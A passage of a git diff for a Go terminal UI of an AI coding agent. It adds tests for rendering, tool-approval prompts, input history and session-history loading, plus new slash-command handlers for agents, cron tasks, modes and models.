+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
 )
 
 // ansiRe matches ANSI CSI escape sequences (colours, bold, etc.).
@@ -16,6 +23,142 @@ var ansiRe = regexp.MustCompile(`\x1b\[[0-9;]*m`)
 
 func stripANSI(s string) string { return ansiRe.ReplaceAllString(s, "") }
 
+func trimLineRightSpace(s string) string {
+	lines := strings.Split(s, "\n")
+	for i, line := range lines {
+		lines[i] = strings.TrimRight(line, " \t")
+	}
+	return strings.Join(lines, "\n")
+}
+
+func TestRenderEditToolResultShowsCompactDiff(t *testing.T) {
+	app := &App{}
+	result := toolResult{
+		toolName: "edit",
+		toolArgs: map[string]any{"path": "internal/acp/acp.go"},
+		diff: &tools.FileDiff{
+			Path:    "internal/acp/acp.go",
+			Added:   1,
+			Deleted: 1,
+			Unified: strings.Join([]string{
+				"--- internal/acp/acp.go",
+				"+++ internal/acp/acp.go",
+				"@@ -551,3 +551,3 @@",
+				" \tctx, cancel := context.WithCancel(context.Background())",
+				"-\tpromptKey := rawIDKey(req.ID)",
+				"+\tpromptKey := mcp.RawIDKey(req.ID)",
+				" \trt.cancelMu.Lock()",
+				"",
+			}, "\n"),
+		},
+	}
+
+	got := trimLineRightSpace(stripANSI(app.renderToolResult(result)))
+	want := strings.Join([]string{
+		"• Edited internal/acp/acp.go (+1 -1)",
+		"    551       ctx, cancel := context.WithCancel(context.Background())",
+		"    552  -    promptKey := rawIDKey(req.ID)",
+		"    552  +    promptKey := mcp.RawIDKey(req.ID)",
+		"    553       rt.cancelMu.Lock()",
+	}, "\n")
+
+	if got != want {
+		t.Fatalf("renderToolResult(edit) =\n%q\nwant\n%q", got, want)
+	}
+}
+
+func TestAssistantMarkdownRendererUsesViewportWidth(t *testing.T) {
+	app := &App{
+		width:               60,
+		assistantRaw:        map[int]string{0: "请看 https://gitee.com/oschina/platform/pulls/11938 这里"},
+		assistantRendered:   make(map[int]string),
+		assistantDirty:      map[int]bool{0: true},
+		currentAssistantIdx: -1,
+		currentThinkIdx:     -1,
+	}
+	app.configureMarkdownRenderer()
+
+	got := stripANSI(app.renderAssistantMessage(0))
+	flattened := strings.ReplaceAll(strings.ReplaceAll(got, "\n", ""), " ", "")
+	if !strings.Contains(flattened, "https://gitee.com/oschina/platform/pulls/11938") {
+		t.Fatalf("renderAssistantMessage() = %q, want URL order preserved", got)
+	}
+	for _, line := range strings.Split(got, "\n") {
+		if width := lipgloss.Width(line); width > app.width {
+			t.Fatalf("rendered line width = %d, want <= %d: %q", width, app.width, line)
+		}
+	}
+}
+
+func TestWindowResizeMarksAssistantMarkdownDirty(t *testing.T) {
+	app := &App{
+		assistantRaw:        map[int]string{0: "hello"},
+		assistantRendered:   map[int]string{0: "old"},
+		assistantDirty:      make(map[int]bool),
+		currentAssistantIdx: -1,
+		currentThinkIdx:     -1,
+	}
+
+	model, _ := app.Update(tea.WindowSizeMsg{Width: 72, Height: 24})
+	updated := model.(*App)
+
+	if updated.mdRenderer == nil {
+		t.Fatal("mdRenderer is nil after resize")
+	}
+	if !updated.assistantDirty[0] {
+		t.Fatal("assistantDirty[0] = false, want true after resize")
+	}
+}
+
+func TestLiveAssistantMessageDoesNotRenderMarkdown(t *testing.T) {
+	app := &App{
+		width:               50,
+		assistantRaw:        map[int]string{0: strings.Repeat("https://example.com/path/", 8)},
+		assistantRendered:   make(map[int]string),
+		assistantDirty:      map[int]bool{0: true},
+		currentAssistantIdx: 0,
+		currentThinkIdx:     -1,
+	}
+	app.configureMarkdownRenderer()
+
+	app.updateViewportContent()
+	if len(app.assistantRendered) != 0 {
+		t.Fatalf("assistantRendered len = %d, want 0 while streaming", len(app.assistantRendered))
+	}
+	if !strings.Contains(stripANSI(app.liveContent), "Assistant: ") {
+		t.Fatalf("liveContent missing assistant prefix: %q", app.liveContent)
+	}
+}
+
+func TestViewClampsLiveContentToKeepInputVisible(t *testing.T) {
+	app := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	app.ready = true
+	app.width = 80
+	app.height = 8
+	app.input.Width = 76
+	app.liveContent = strings.Join([]string{
+		"line 1",
+		"line 2",
+		"line 3",
+		"line 4",
+		"line 5",
+		"line 6",
+		"line 7",
+		"line 8",
+	}, "\n")
+
+	got := stripANSI(app.View())
+	if strings.Contains(got, "line 1") {
+		t.Fatalf("View() kept oldest live line despite limited height:\n%s", got)
+	}
+	if !strings.Contains(got, app.input.Placeholder) {
+		t.Fatalf("View() missing input placeholder:\n%s", got)
+	}
+	if !strings.Contains(got, "Tab:mode") {
+		t.Fatalf("View() missing footer:\n%s", got)
+	}
+}
+
 // ─── formatCachePercent ───────────────────────────────────────────────────────
 
 func TestFormatCachePercent(t *testing.T) {
@@ -276,6 +419,65 @@ func TestHandleAgentEventReservesAssistantSlotBeforeTextDelta(t *testing.T) {
 	}
 }
 
+func TestHandleAgentEventCommitsStreamBeforeApproval(t *testing.T) {
+	a := &App{
+		messages:            []string{"You: hi"},
+		currentAssistantIdx: -1,
+		currentThinkIdx:     -1,
+		printedMessageIdx:   make(map[int]bool),
+		assistantRaw:        make(map[int]string),
+		assistantRendered:   make(map[int]string),
+		assistantDirty:      make(map[int]bool),
+	}
+
+	a.handleAgentEvent(agent.Event{Type: agent.EventTurnStart})
+	a.handleAgentEvent(agent.Event{Type: agent.EventThinkDelta, ThinkDelta: "thinking"})
+	a.handleAgentEvent(agent.Event{Type: agent.EventTextDelta, TextDelta: "I need to run a command."})
+	a.handleAgentEvent(agent.Event{
+		Type:         agent.EventToolApprovalRequest,
+		ApprovalID:   "approval-1",
+		ApprovalTool: "bash",
+		ApprovalArgs: map[string]any{"command": "go test ./internal/tui"},
+	})
+
+	joined := stripANSI(strings.Join(a.pendingPrints, "\n"))
+	thinkAt := strings.Index(joined, "think: thinking")
+	assistantAt := strings.Index(joined, "Assistant: I need to run a command.")
+	approvalAt := strings.Index(joined, "Approval required for [bash]")
+	if thinkAt < 0 || assistantAt < 0 || approvalAt < 0 {
+		t.Fatalf("pending prints missing expected content: %q", joined)
+	}
+	if !(thinkAt < assistantAt && assistantAt < approvalAt) {
+		t.Fatalf("pending prints out of order: %q", joined)
+	}
+	if a.currentThinkIdx != -1 || a.currentAssistantIdx != -1 {
+		t.Fatalf("active stream indices = think %d assistant %d, want both reset", a.currentThinkIdx, a.currentAssistantIdx)
+	}
+}
+
+func TestFormatApprovalArgsEditShowsPathAndDiff(t *testing.T) {
+	args := map[string]any{
+		"path": "README.md",
+		"edits": []any{
+			map[string]any{
+				"oldText": "Hello\nWorld\n",
+				"newText": "Hello\nGophers\n",
+			},
+		},
+	}
+
+	got := formatApprovalArgs("edit", args)
+	if !strings.Contains(got, "path: README.md") {
+		t.Fatalf("formatApprovalArgs(edit) missing path: %q", got)
+	}
+	if !strings.Contains(got, "@@ -1,2 +1,2 @@") {
+		t.Fatalf("formatApprovalArgs(edit) missing hunk header: %q", got)
+	}
+	if !strings.Contains(got, "-World") || !strings.Contains(got, "+Gophers") {
+		t.Fatalf("formatApprovalArgs(edit) missing line diff: %q", got)
+	}
+}
+
 func TestAbortClearsQueuedInput(t *testing.T) {
 	a := &App{
 		inputQueue: make([]InputEvent, 0, 4),
@@ -320,18 +522,19 @@ func TestListenEventsPassesThroughDoneAndError(t *testing.T) {
 	eventCh <- agent.Event{Type: agent.EventDone}
 	eventCh <- agent.Event{Type: agent.EventError, Error: assertErr("boom")}
 	close(eventCh)
+	app := &App{eventCh: eventCh}
 
-	msg := listenEvents(eventCh)()
+	msg := app.listenAgentEvents()()
 	if ev, ok := msg.(agentEventMsg); !ok || ev.event.Type != agent.EventDone {
 		t.Fatalf("first msg = %#v, want agentEventMsg(EventDone)", msg)
 	}
 
-	msg = listenEvents(eventCh)()
+	msg = app.listenAgentEvents()()
 	if ev, ok := msg.(agentEventMsg); !ok || ev.event.Type != agent.EventError || ev.event.Error == nil || ev.event.Error.Error() != "boom" {
 		t.Fatalf("second msg = %#v, want agentEventMsg(EventError boom)", msg)
 	}
 
-	msg = listenEvents(eventCh)()
+	msg = app.listenAgentEvents()()
 	if _, ok := msg.(agentDoneMsg); !ok {
 		t.Fatalf("third msg = %#v, want agentDoneMsg", msg)
 	}
@@ -345,6 +548,156 @@ func teaKeyMsgForTest(s string) tea.KeyMsg {
 	return tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune(s)}
 }
 
+func teaSpecialKeyMsgForTest(key tea.KeyType) tea.KeyMsg {
+	return tea.KeyMsg{Type: key}
+}
+
+func TestInputHomeEndKeysReachTextInput(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.input.SetValue("abc")
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyHome))
+	a.flushInputQueue()
+	a.Update(teaKeyMsgForTest("X"))
+	a.flushInputQueue()
+
+	if got := a.input.Value(); got != "Xabc" {
+		t.Fatalf("value after home insert = %q, want Xabc", got)
+	}
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyEnd))
+	a.flushInputQueue()
+	a.Update(teaKeyMsgForTest("Z"))
+	a.flushInputQueue()
+
+	if got := a.input.Value(); got != "XabcZ" {
+		t.Fatalf("value after end insert = %q, want XabcZ", got)
+	}
+}
+
+func TestInputHistoryNavigationPreservesDraft(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.recordInputHistory("first")
+	a.recordInputHistory("second")
+	a.input.SetValue("draft")
+
+	if !a.navigateInputHistory(-1) || a.input.Value() != "second" {
+		t.Fatalf("first up value = %q, want second", a.input.Value())
+	}
+	if !a.navigateInputHistory(-1) || a.input.Value() != "first" {
+		t.Fatalf("second up value = %q, want first", a.input.Value())
+	}
+	if !a.navigateInputHistory(-1) || a.input.Value() != "first" {
+		t.Fatalf("third up value = %q, want first", a.input.Value())
+	}
+	if !a.navigateInputHistory(1) || a.input.Value() != "second" {
+		t.Fatalf("first down value = %q, want second", a.input.Value())
+	}
+	if !a.navigateInputHistory(1) || a.input.Value() != "draft" {
+		t.Fatalf("second down value = %q, want draft", a.input.Value())
+	}
+	if a.navigateInputHistory(1) {
+		t.Fatal("down outside history returned true, want false")
+	}
+}
+
+func TestInputHistoryNavigationFlushesQueuedDraft(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.recordInputHistory("previous")
+
+	a.Update(teaKeyMsgForTest("draft"))
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyUp))
+
+	if got := a.input.Value(); got != "previous" {
+		t.Fatalf("up value = %q, want previous", got)
+	}
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyDown))
+	if got := a.input.Value(); got != "draft" {
+		t.Fatalf("down value = %q, want queued draft restored", got)
+	}
+}
+
+func TestEscAbortClearsApprovalState(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.isThinking = true
+	a.waitingForApproval = true
+	a.pendingApprovalID = "approval-1"
+	a.approvalQueue = []pendingApproval{{approvalID: "approval-2", toolName: "bash"}}
+
+	a.Update(teaSpecialKeyMsgForTest(tea.KeyEsc))
+
+	if a.waitingForApproval {
+		t.Fatal("waitingForApproval = true, want false")
+	}
+	if a.pendingApprovalID != "" {
+		t.Fatalf("pendingApprovalID = %q, want empty", a.pendingApprovalID)
+	}
+	if len(a.approvalQueue) != 0 {
+		t.Fatalf("len(approvalQueue) = %d, want 0", len(a.approvalQueue))
+	}
+}
+
+func TestRuneInputTabDoesNotCycleMode(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.input.SetValue("prefix ")
+
+	a.Update(teaKeyMsgForTest("tab"))
+	a.flushInputQueue()
+
+	if got := a.mode; got != "agent" {
+		t.Fatalf("mode = %q, want agent", got)
+	}
+	if got := a.input.Value(); got != "prefix tab" {
+		t.Fatalf("input = %q, want %q", got, "prefix tab")
+	}
+}
+
+func TestRuneInputEscDoesNotAbortOrClearInput(t *testing.T) {
+	a := NewApp(nil, &provider.Model{Name: "test"}, config.DefaultSettings(), nil, nil, "", "", nil, "agent", false, nil, nil, nil)
+	a.input.SetValue("prefix ")
+
+	a.Update(teaKeyMsgForTest("esc"))
+	a.flushInputQueue()
+
+	if got := a.input.Value(); got != "prefix esc" {
+		t.Fatalf("input = %q, want %q", got, "prefix esc")
+	}
+}
+
+func TestInitWithProgramDoesNotBlock(t *testing.T) {
+	a := NewApp(
+		&historyInjectMockProvider{},
+		&provider.Model{ID: "mock-model", Name: "Mock"},
+		config.DefaultSettings(),
+		nil,
+		tools.NewRegistry(t.TempDir(), nil),
+		"",
+		"",
+		nil,
+		"agent",
+		false,
+		nil,
+		nil,
+		nil,
+	)
+	a.SetInitialMessage("hello")
+	p := tea.NewProgram(a)
+	a.SetProgram(p)
+
+	done := make(chan struct{})
+	go func() {
+		_ = a.Init()
+		close(done)
+	}()
+
+	select {
+	case <-done:
+	case <-time.After(200 * time.Millisecond):
+		t.Fatal("Init blocked while printing initial history")
+	}
+}
+
 // TestCacheHighlightThresholdMath verifies the arithmetic of the 50% boundary
 // independent of any rendering logic.
 func TestCacheHighlightThresholdMath(t *testing.T) {
@@ -373,3 +726,149 @@ func TestCacheHighlightThresholdMath(t *testing.T) {
 		}
 	}
 }
+
+type historyInjectMockProvider struct{}
+
+func (p *historyInjectMockProvider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	ch := make(chan provider.StreamEvent, 2)
+	ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: "ok"}
+	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: "end_turn"}
+	close(ch)
+	return ch
+}
+
+func (p *historyInjectMockProvider) Name() string { return "mock" }
+func (p *historyInjectMockProvider) Models() []*provider.Model {
+	return []*provider.Model{{ID: "mock-model", Name: "Mock"}}
+}
+func (p *historyInjectMockProvider) GetModel(id string) *provider.Model {
+	for _, m := range p.Models() {
+		if m.ID == id {
+			return m
+		}
+	}
+	return nil
+}
+
+func TestProcessInputLoadsSessionHistoryIntoAgentEvenWhenUIHistoryAlreadyLoaded(t *testing.T) {
+	tmp := t.TempDir()
+	cwd := filepath.Join(tmp, "project")
+	if err := os.MkdirAll(cwd, 0755); err != nil {
+		t.Fatalf("mkdir cwd: %v", err)
+	}
+	sessionDir := filepath.Join(tmp, "sessions")
+
+	sess := session.New(cwd, sessionDir)
+	if err := sess.Init(); err != nil {
+		t.Fatalf("init session: %v", err)
+	}
+	sess.AppendMessage(provider.NewUserMessage("old user"))
+	sess.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "old assistant"}}))
+
+	settings := config.DefaultSettings()
+	settings.DefaultThinkingLevel = "off"
+	a := &App{
+		provider:            &historyInjectMockProvider{},
+		model:               &provider.Model{ID: "mock-model", Name: "Mock"},
+		settings:            settings,
+		session:             sess,
+		registry:            tools.NewRegistry(cwd, nil),
+		historyLoaded:       true, // UI already rendered history
+		assistantRaw:        make(map[int]string),
+		assistantRendered:   make(map[int]string),
+		assistantDirty:      make(map[int]bool),
+		currentAssistantIdx: -1,
+		currentThinkIdx:     -1,
+	}
+
+	a.processInput("new question")
+
+	deadline := time.Now().Add(2 * time.Second)
+	for {
+		if a.agent != nil {
+			msgs := a.agent.GetMessages()
+			if len(msgs) >= 4 {
+				if msgs[0].Role != "user" || msgs[0].Content != "old user" {
+					t.Fatalf("first message = %+v, want old history user message", msgs[0])
+				}
+				if msgs[1].Role != "assistant" {
+					t.Fatalf("second message role = %s, want assistant", msgs[1].Role)
+				}
+				if msgs[2].Role != "user" || msgs[2].Content != "new question" {
+					t.Fatalf("third message = %+v, want new user message", msgs[2])
+				}
+				return
+			}
+		}
+		if time.Now().After(deadline) {
+			t.Fatalf("timeout waiting for agent messages")
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+}
+
+func TestInitThenProcessInputStillInjectsSessionHistory(t *testing.T) {
+	tmp := t.TempDir()
+	cwd := filepath.Join(tmp, "project")
+	if err := os.MkdirAll(cwd, 0755); err != nil {
+		t.Fatalf("mkdir cwd: %v", err)
+	}
+	sessionDir := filepath.Join(tmp, "sessions")
+
+	sess := session.New(cwd, sessionDir)
+	if err := sess.Init(); err != nil {
+		t.Fatalf("init session: %v", err)
+	}
+	sess.AppendMessage(provider.NewUserMessage("history user"))
+	sess.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "history assistant"}}))
+
+	settings := config.DefaultSettings()
+	settings.DefaultThinkingLevel = "off"
+	app := NewApp(
+		&historyInjectMockProvider{},
+		&provider.Model{ID: "mock-model", Name: "Mock"},
+		settings,
+		sess,
+		tools.NewRegistry(cwd, nil),
+		"",
+		"",
+		nil,
+		"agent",
+		false,
+		nil,
+		nil,
+		nil,
+	)
+
+	// Simulate real startup flow: Init() loads history into UI and flips historyLoaded.
+	_ = app.Init()
+
+	if !app.historyLoaded {
+		t.Fatalf("historyLoaded = false, want true after Init")
+	}
+
+	app.processInput("follow-up")
+
+	deadline := time.Now().Add(2 * time.Second)
+	for {
+		if app.agent != nil {
+			msgs := app.agent.GetMessages()
+			if len(msgs) >= 4 {
+				if msgs[0].Role != "user" || msgs[0].Content != "history user" {
+					t.Fatalf("first message = %+v, want history user", msgs[0])
+				}
+				if msgs[1].Role != "assistant" {
+					t.Fatalf("second message role = %s, want assistant", msgs[1].Role)
+				}
+				if msgs[2].Role != "user" || msgs[2].Content != "follow-up" {
+					t.Fatalf("third message = %+v, want follow-up user message", msgs[2])
+				}
+				return
+			}
+		}
+		if time.Now().After(deadline) {
+			t.Fatalf("timeout waiting for agent messages")
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+}
diff --git a/internal/tui/commands.go b/internal/tui/commands.go
new file mode 100644
index 0000000..16a76fc
--- /dev/null
+++ b/internal/tui/commands.go
@@ -0,0 +1,892 @@
+package tui
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+
+	tea "github.com/charmbracelet/bubbletea"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/session"
+)
+
+// handleAgentCommand handles /agent subcommands (multi-agent mode).
+func (a *App) handleAgentCommand(parts []string) {
+	if !a.multiAgent {
+		a.addMessage(errorStyle.Render("Multi-agent mode is not enabled. Use Ctrl+P to toggle."))
+		return
+	}
+	if len(parts) < 2 {
+		a.addMessage(statusStyle.Render("Usage: /agent list|switch|destroy"))
+		return
+	}
+	switch parts[1] {
+	case "list":
+		a.listAgents()
+	case "switch":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /agent switch <id>"))
+			return
+		}
+		a.switchAgent(agentpkg.AgentID(parts[2]))
+	case "destroy":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /agent destroy <id>"))
+			return
+		}
+		a.destroyAgent(agentpkg.AgentID(parts[2]))
+	default:
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown agent command: %s", parts[1])))
+	}
+}
+
+func (a *App) listAgents() {
+	a.addMessage(statusStyle.Render(fmt.Sprintf("Multi-agent mode: ON (active: %s)", a.activeAgent)))
+	if a.agentMgr == nil {
+		a.addMessage(statusStyle.Render("  (AgentManager not initialized)"))
+		return
+	}
+
+	ids := a.agentMgr.List()
+	if len(ids) == 0 {
+		a.addMessage(statusStyle.Render("  No agents running"))
+		return
+	}
+
+	for _, id := range ids {
+		parentID, hasParent := a.agentMgr.Parent(id)
+		children := a.agentMgr.Children(id)
+		status := "running"
+		if id == a.activeAgent {
+			status = "active"
+		}
+
+		info := fmt.Sprintf("  %s [%s]", id, status)
+		if hasParent {
+			info += fmt.Sprintf(" parent=%s", parentID)
+		}
+		if len(children) > 0 {
+			info += fmt.Sprintf(" children=%d", len(children))
+		}
+		a.addMessage(statusStyle.Render(info))
+	}
+}
+
+func (a *App) switchAgent(id agentpkg.AgentID) {
+	if a.agentMgr == nil {
+		a.addMessage(errorStyle.Render("AgentManager not initialized"))
+		return
+	}
+
+	_, ok := a.agentMgr.Get(id)
+	if !ok {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Agent %s not found", id)))
+		return
+	}
+
+	a.activeAgent = id
+	a.addMessage(statusStyle.Render(fmt.Sprintf("Switched to agent: %s", id)))
+}
+
+func (a *App) destroyAgent(id agentpkg.AgentID) {
+	if id == "main" {
+		a.addMessage(errorStyle.Render("Cannot destroy the main agent"))
+		return
+	}
+
+	if a.agentMgr == nil {
+		a.addMessage(errorStyle.Render("AgentManager not initialized"))
+		return
+	}
+
+	if err := a.agentMgr.Destroy(id); err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Failed to destroy agent %s: %v", id, err)))
+		return
+	}
+
+	// If we destroyed the active agent, switch to main
+	if a.activeAgent == id {
+		a.activeAgent = "main"
+	}
+
+	a.addMessage(statusStyle.Render(fmt.Sprintf("Agent %s destroyed", id)))
+}
+
+// toggleMultiAgent toggles multi-agent mode on/off.
+func (a *App) toggleMultiAgent() {
+	a.multiAgent = !a.multiAgent
+	if a.multiAgent {
+		a.addMessage(statusStyle.Render("✅ Multi-agent mode ON (Ctrl+P to toggle)"))
+	} else {
+		a.addMessage(statusStyle.Render("❌ Multi-agent mode OFF"))
+	}
+}
+
+// handleCronCommand handles /cron subcommands (multi-agent mode).
+func (a *App) handleCronCommand(parts []string) {
+	if !a.multiAgent {
+		a.addMessage(errorStyle.Render("Cron commands require multi-agent mode. Use Ctrl+P to toggle."))
+		return
+	}
+	if a.cronStore == nil {
+		a.addMessage(errorStyle.Render("Cron store not initialized."))
+		return
+	}
+	if len(parts) < 2 {
+		a.addMessage(statusStyle.Render("Usage: /cron add|list|enable|disable|remove|run"))
+		return
+	}
+	switch parts[1] {
+	case "add":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /cron add <description>"))
+			return
+		}
+		desc := strings.Join(parts[2:], " ")
+		job, err := a.cronStore.Create(cron.CronJob{
+			Name:    desc,
+			Prompt:  desc,
+			Enabled: true,
+			Mode:    a.mode,
+		})
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("Failed to create cron task: %v", err)))
+			return
+		}
+		a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Cron task created: %s (id: %s)", job.Name, job.ID)))
+	case "list":
+		jobs, err := a.cronStore.List()
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("Failed to list cron tasks: %v", err)))
+			return
+		}
+		if len(jobs) == 0 {
+			a.addMessage(statusStyle.Render("Cron tasks: (none configured)"))
+			return
+		}
+		var sb strings.Builder
+		sb.WriteString(fmt.Sprintf("Cron tasks (%d):\n", len(jobs)))
+		for _, j := range jobs {
+			status := "✅"
+			if !j.Enabled {
+				status = "⏸"
+			}
+			if j.LastStatus == "failed" {
+				status = "❌"
+			}
+			sb.WriteString(fmt.Sprintf("  %s [%s] %s (runs: %d)\n", status, j.ID, j.Name, j.RunCount))
+		}
+		a.addMessage(statusStyle.Render(sb.String()))
+	case "enable":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /cron enable <id>"))
+			return
+		}
+		job, err := a.cronStore.Get(parts[2])
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		job.Enabled = true
+		a.cronStore.Update(*job)
+		a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Cron task %s enabled", job.ID)))
+	case "disable":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /cron disable <id>"))
+			return
+		}
+		job, err := a.cronStore.Get(parts[2])
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		job.Enabled = false
+		a.cronStore.Update(*job)
+		a.addMessage(statusStyle.Render(fmt.Sprintf("⏸ Cron task %s disabled", job.ID)))
+	case "remove":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /cron remove <id>"))
+			return
+		}
+		if err := a.cronStore.Delete(parts[2]); err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		a.addMessage(statusStyle.Render(fmt.Sprintf("🗑 Cron task %s removed", parts[2])))
+	case "run":
+		if len(parts) < 3 {
+			a.addMessage(statusStyle.Render("Usage: /cron run <id>"))
+			return
+		}
+		job, err := a.cronStore.Get(parts[2])
+		if err != nil {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("%v", err)))
+			return
+		}
+		if a.scheduler == nil {
+			a.addMessage(errorStyle.Render("Scheduler not running."))
+			return
+		}
+		// Trigger immediate run by resetting LastRun
+		job.LastRun = time.Time{}
+		a.cronStore.Update(*job)
+		a.addMessage(statusStyle.Render(fmt.Sprintf("▶ Cron task %s triggered (will run on next scheduler tick)", job.ID)))
+	default:
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown cron command: %s", parts[1])))
+	}
+}
+
+func (a *App) handleCommand(cmd string) tea.Cmd {
+	parts := strings.Fields(cmd)
+	command := parts[0]
+
+	switch command {
+	case "/mode":
+		if len(parts) > 1 {
+			switch parts[1] {
+			case "plan", "agent", "yolo":
+				a.mode = parts[1]
+				// If agent is currently running, abort it so the new mode takes effect immediately
+				if a.isThinking && a.agent != nil {
+					a.agent.Abort()
+					a.agent = nil
+					a.agentHistoryLoaded = false
+					a.inputQueueMu.Lock()
+					a.inputQueue = a.inputQueue[:0]
+					a.lastInputTime = time.Time{}
+					a.inputQueueMu.Unlock()
+					a.isThinking = false
+					a.finishRequestTimer()
+					a.addMessage(statusStyle.Render("⏹ Aborted (mode change)"))
+				} else {
+					a.agent = nil
+					a.agentHistoryLoaded = false
+				}
+				a.addMessage(statusStyle.Render(fmt.Sprintf("Mode: %s", strings.ToUpper(a.mode))))
+			default:
+				a.addMessage(errorStyle.Render("Invalid mode"))
+			}
+		} else {
+			a.addMessage(statusStyle.Render(fmt.Sprintf("Current mode: %s", strings.ToUpper(a.mode))))
+			switch a.mode {
+			case "plan":
+				a.addMessage(statusStyle.Render("  Permissions: READ only (no modifications)"))
+			case "agent":
+				a.addMessage(statusStyle.Render("  Permissions: READ/WRITE/EDIT auto | BASH requires approval"))
+			case "yolo":
+				a.addMessage(statusStyle.Render("  Permissions: ALL tools auto-execute"))
+			}
+		}
+	case "/model":
+		if len(parts) > 1 {
+			// Switch model
+			modelID := parts[1]
+			newModel := a.provider.GetModel(modelID)
+			if newModel == nil {
+				a.addMessage(errorStyle.Render(fmt.Sprintf("Model not found: %s", modelID)))
+				// List available models
+				models := a.provider.Models()
+				if len(models) > 0 {
+					var sb strings.Builder
+					sb.WriteString("Available models:\n")
+					for _, m := range models {
+						marker := " "
+						if m.ID == a.model.ID {
+							marker = "*"
+						}
+						sb.WriteString(fmt.Sprintf("  [%s] %s (%s)\n", marker, m.Name, m.ID))
+					}
+					a.addMessage(statusStyle.Render(sb.String()))
+				}
+				return nil
+			}
+			a.model = newModel
+			// Reset agent so next message uses the new model
+			a.agent = nil
+			a.agentHistoryLoaded = false
+			a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Model switched to: %s (%s)", newModel.Name, newModel.ID)))
+		} else {
+			// Show current model and available models
+			a.addMessage(statusStyle.Render(fmt.Sprintf("Current model: %s (%s)", a.model.Name, a.model.ID)))
+			models := a.provider.Models()
+			if len(models) > 0 {
+				var sb strings.Builder
+				sb.WriteString("Available models (use /model <id> to switch):\n")
+				for _, m := range models {
+					marker := " "
+					if m.ID == a.model.ID {
+						marker = "*"
+					}
+					sb.WriteString(fmt.Sprintf("  [%s] %s (%s)\n", marker, m.Name, m.ID))
+				}
+				a.addMessage(statusStyle.Render(sb.String()))
+			}
+		}
+	case "/skills":
+		a.listSkills()
+	case "/skill":
+		if len(parts) > 1 {
+			a.activateSkill(parts[1])
+		} else {
+			a.listSkills()
+		}
+	case "/compact":
+		if a.agent == nil {
+			a.addMessage(errorStyle.Render("Nothing to compact: no active conversation."))
+		} else {
+			msgs := a.agent.GetMessages()
+			if len(msgs) < 2 {
+				a.addMessage(errorStyle.Render("Nothing to compact: conversation is too short."))
+			} else {
+				a.agent.SetForceCompact()
+				if usage := a.agent.GetContextUsage(); usage != nil && usage.Percent != nil {
+					a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Context compaction will be triggered on the next message. (current: %d tokens, %.0f%% used)", usage.Tokens, *usage.Percent)))
+				} else {
+					a.addMessage(statusStyle.Render("✅ Context compaction will be triggered on the next message."))
+				}
+			}
+		}
+	case "/clear":
+		a.messages = nil
+		a.agent = nil
+		a.agentHistoryLoaded = false
+		a.contextUsage = nil
+		a.totalInputTokens = 0
+		a.totalCacheRead = 0
+		a.totalCacheWrite = 0
+		a.pastes = make(map[int]string)
+		a.pasteCounter = 0
+		a.activeSkills = make(map[string]string)
+		a.extraContext = a.baseExtraContext
+		a.updateViewportContent()
+		a.addMessage(statusStyle.Render("✅ Conversation cleared"))
+	case "/quit":
+		return tea.Quit
+	case "/sessions":
+		a.handleSessionsCommand(parts)
+	case "/init_mcp":
+		a.handleInitMCPCommand(parts)
+	case "/mcps":
+		a.handleMCPsCommand()
+	case "/agent":
+		a.handleAgentCommand(parts)
